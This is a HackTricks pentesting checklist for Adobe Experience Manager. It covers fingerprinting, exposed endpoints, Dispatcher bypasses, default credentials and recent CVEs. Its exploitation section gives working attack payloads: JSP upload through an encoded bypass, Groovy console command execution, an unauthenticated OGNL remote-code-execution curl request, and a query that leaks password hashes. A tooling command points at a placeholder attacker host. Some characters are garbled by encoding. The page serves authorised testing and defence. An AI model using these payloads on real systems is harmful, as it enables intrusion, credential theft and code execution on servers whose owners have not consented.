HackTricks
AEM (Adobe Experience Manager) Pentesting
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the π¬ Discord group or the telegram group or follow us on Twitter π¦ @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on top of Apache Sling/Felix (OSGi) and a Java Content Repository (JCR).
From an attacker perspective AEM instances very often expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long tail of CVEs that are patched every quarter.
The checklist below focuses on externally reachable (unauth) attack surface that keeps showing up in real engagements (2022-2026).
1. Fingerprinting
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1 # header added by AEM Dispatcher
X-Vary: Accept-Encoding
Other quick indicators:
/etc.clientlibs/static path present (returns JS/CSS)./libs/granite/core/content/login.htmllogin page with the βAdobe Experience Managerβ banner.</script><!--/* CQ */-->comment at the bottom of HTML.
2. High-value unauthenticated endpoints
| Path | What you get | Notes |
|---|---|---|
/.json, /.1.json | JCR nodes via DefaultGetServlet | Often blocked, but Dispatcher bypass (see below) works. |
/bin/querybuilder.json?path=/ | QueryBuilder API | Leak of page tree, internal paths, user names. |
/system/console/status-*, /system/console/bundles | OSGi/Felix console | 403 by default; if exposed & creds found β bundle-upload RCE. |
/crx/packmgr/index.jsp | Package Manager | Allows authenticated content packages β JSP payload upload. |
/etc/groovyconsole/** | AEM Groovy Console | If exposed β arbitrary Groovy / Java execution. |
/libs/cq/AuditlogSearchServlet.json | Audit logs | Information disclosure. |
/libs/cq/ui/content/dumplibs.html | ClientLibs dump | XSS vector. |
/adminui/debug | AEM Forms on JEE Struts dev-mode OGNL evaluator | On misconfigured Forms installs (CVE-2025-54253) this endpoint executes unauthenticated OGNL β RCE. |
Dispatcher bypass tricks (still working in 2025/2026)
Most production sites sit behind the Dispatcher (reverse-proxy). Filter rules are frequently bypassed by abusing encoded characters or allowed static extensions.
Classic semicolon + allowed extension
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
Encoded slash bypass (2025 KB ka-27832)
GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1
If the Dispatcher allows encoded slashes, this returns JSON even when /bin is supposedly denied.
3. Common misconfigurations (still alive in 2026)
- Anonymous POST servlet β
POST /.jsonwith:operation=importlets you plant new JCR nodes. Blocking*.jsonPOST in the Dispatcher fixes it. - World-readable user profiles β default ACL grants
jcr:readon/home/users/**/profile/*to everyone. - Default credentials β
admin:admin,author:author,replication:replication. - WCMDebugFilter enabled β reflected XSS via
?debug=layout(CVE-2016-7882, still found on legacy 6.4 installs). - Groovy Console exposed β remote code execution by sending a Groovy script:
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json - Dispatcher encoded-slash gap β
/bin/querybuilder.jsonand/etc/truststore.jsonreachable with%2f/%3Beven when blocked by path filters. - AEM Forms Struts devMode left enabled β
/adminui/debug?expression=evaluates OGNL without auth (CVE-2025-54253) leading to unauth RCE; paired XXE in Forms submission (CVE-2025-54254) allows file read.
4. Recent vulnerabilities (service-pack cadence)
| Quarter | CVE / Bulletin | Affected | Impact |
|---|---|---|---|
| Dec 2025 | APSB25-115, CVE-2025-64537/64539 | 6.5.24 & earlier, Cloud 2025.12 | Multiple critical/stored XSS β code execution via author UI. |
| Sep 2025 | APSB25-90 | 6.5.23 & earlier | Security feature bypass chain (Dispatcher auth checker) β upgrade to 6.5.24/Cloud 2025.12. |
| Aug 2025 | CVE-2025-54253 / 54254 (AEM Forms JEE) | Forms 6.5.23.0 and earlier | DevMode OGNL RCE + XXE file read, unauthenticated. |
| Jun 2025 | APSB25-48 | 6.5.23 & earlier | Stored XSS and privilege escalation in Communities components. |
| Dec 2024 | APSB24-69 (rev. Mar 2025 adds CVE-2024-53962β¦74) | 6.5.22 & earlier | DOM/Stored XSS, arbitrary code exec (low-priv). |
| Dec 2023 | APSB23-72 | β€ 6.5.18 | DOM-based XSS via crafted URL. |
Always check the APSB bulletin matching the customerβs service-pack and push for the latest 6.5.24 (Nov 26, 2025) or Cloud Service 2025.12. AEM Forms on JEE requires its own add-on hotfix 6.5.0-0108+.
5. Exploitation snippets
5.1 RCE via dispatcher bypass + JSP upload
If anonymous write is possible:
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded
:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
Now request /content/evil.jsp β the JSP runs with the AEM process user.
5.2 SSRF to RCE (historical < 6.3)
/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/consoleaem_ssrf2rce.py from aem-hacker automates the full chain.
5.3 OGNL RCE on AEM Forms JEE (CVE-2025-54253)
# Unauth devMode OGNL to run whoami
curl -k "https://target:8443/adminui/debug?expression=%23cmd%3D%27whoami%27,%23p=new%20java.lang.ProcessBuilder(%23cmd).start(),%23out=new%20java.io.InputStreamReader(%23p.getInputStream()),%23br=new%20java.io.BufferedReader(%23out),%23br.readLine()"
If vulnerable, the HTTP body contains the command output.
5.4 QueryBuilder hash disclosure (encoded slash bypass)
GET /%2fbin%2fquerybuilder.json?path=/home&type=rep:User&p.hits=full&p.nodedepth=2&p.offset=0 HTTP/1.1
Returns user nodes including rep:password hashes when anonymous read ACLs are default.
6. Tooling
- aem-hacker β Swiss-army enumeration script, supports dispatcher bypass, SSRF detection, default-creds checks and more.
python3 aem_hacker.py -u https://target --host attacker-ip - Tenable WAS plugin 115065 β Detects QueryBuilder hash disclosure & encoded-slash bypass automatically (published Dec 2025).
- Content brute-force β recursively request
/_jcr_content.(json|html)to discover hidden components. - osgi-infect β upload malicious OSGi bundle via
/system/console/bundlesif creds available.
References
- Adobe Security Bulletin APSB25-115 β Security updates for Adobe Experience Manager (Dec 9, 2025)
- BleepingComputer β Adobe issues emergency fixes for AEM Forms zero-days (Aug 5, 2025)
Tip
Learn & practice AWS Hacking:
Learn & practice GCP Hacking:
Learn & practice Az Hacking:Support HackTricks
- Check the subscription plans!
- Join the π¬ Discord group or the telegram group or follow us on Twitter π¦ @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.